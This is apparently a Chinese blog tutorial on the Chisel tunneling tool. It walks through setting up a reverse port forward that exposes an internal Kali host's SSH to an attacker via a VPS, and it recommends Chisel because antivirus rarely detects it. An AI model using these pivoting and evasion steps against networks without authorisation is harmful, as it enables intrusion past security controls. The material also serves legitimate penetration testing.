Chisel 内网穿透工具

地球胖头鱼 2021-04-19
系统与内网安全 发布于 2021-04-19 10:52:55 阅读 348 评论 0

工具简介

Chisel可用来搭建内网隧道,类似于常用的frp和nps之类的工具。由于目前使用的人比较少,因此对于有些杀软还不能准确的识别出该工具。chisel可以进行端口转发、反向端口转发以及Socks流量代理,使用go语言编写,支持多个平台使用,是进行内网穿透的一个鲜为人知的好工具。

安装与使用

下载

下载地址

https://github.com/jpillora/chisel/releases/tag/v1.7.4

Chisel内网穿透工具

该工具使用的是Go语言进行编写,使用Go语言的好处就是可以适应于各个平台,也可以对源码进行编译,或者直接使用编译好的的版本。

工具使用

这个工具和其他工还有一点不同,就是没有服务器和客户端,只有一个可执行文件。可以通过执行这个文件,让其充当服务器端或者客户端。如下所示:

Chisel内网穿透工具

  1. 查看chisel工具的帮助
./chisel -help

Chisel内网穿透工具

  1. 查看chisel服务器端的帮助
./chisel server -help

Chisel内网穿透工具

  1. 查看chisel客户端的帮助
./chisel client -help

Chisel内网穿透工具

这块只是重点讲解一下如何查看帮助,接下来会去介绍如何在实战中使用chisel工具。

隧道搭建

首先需要三台linux主机,在这里使用VPS作为chisel服务器端,然后使用kali作为内网主机,使用另一台主机作为我们的攻击者主机。

  1. 第一步:搭建chisel隧道
chisel服务端(CentOS上)

./chisel server -p 6666 --reverse

Chisel内网穿透工具

首先,服务器端监听6666端口,然后使用reverse参数,reverse表示的是服务端使用反向模式,也就是说流量转到哪个端口由客户端指定。

chisel客户端(kali的IP192.168.223.160)

./chisel client -v VPS:6666 R:0.0.0.0:8888:192.168.223.160:22
./chisel client -v VPS:6666 R:8888:192.168.223.160:22

客户端启动成功。

说明:可以使用第一条命令,也可以使用第二条命令,其实第二条命令和第一条命令效果一样,只是省略了0.0.0.0,chisel的客户端默认使用的就是0.0.0.0这个IP。

Chisel内网穿透工具

  1. 第二步:将kali的22端口转发到VPS的8888端口上,其实上一步已经完成了这一步操作,现在看一下chisel服务端和客户端的连接情况。

  2. 第三步:使用攻击者主机连接kali的SSH

ssh -p 8888 root@VPS(chisel服务端IP)

Chisel内网穿透工具

chisel的优劣点

优点

目前像frp、nps这种常见的工具已经很容易被杀软识别,上次打内网传的frp就很快被杀软识别,因此chisel可以作为一个不太常用的工具进行尝试,可能会因为目前特征较少,从而绕过杀软。

缺点

个人觉得chisel进行socks流量代理的时候,可能会比较麻烦,因为需要进行本地端口转发,这样难免会多进行一步,但是我觉得这个也就是一条命令的事情,个人觉得影响不大。

本作品采用《CC 协议》,转载必须注明作者和本文链接
讨论数量: 0
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!
地球胖头鱼
未填写
  • 作者发布文章248
  • 作者收获粉丝10
  • 作者收到点赞3
  • 所有文章被收藏了5
  • 博客总访问量排行第2
  • 博客总访问量7.6 万(每日更新)
查看所有博文